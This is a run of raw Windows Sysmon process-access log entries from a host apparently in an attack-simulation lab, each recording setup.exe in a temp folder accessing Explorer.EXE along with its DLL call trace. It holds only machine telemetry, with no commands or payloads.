13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+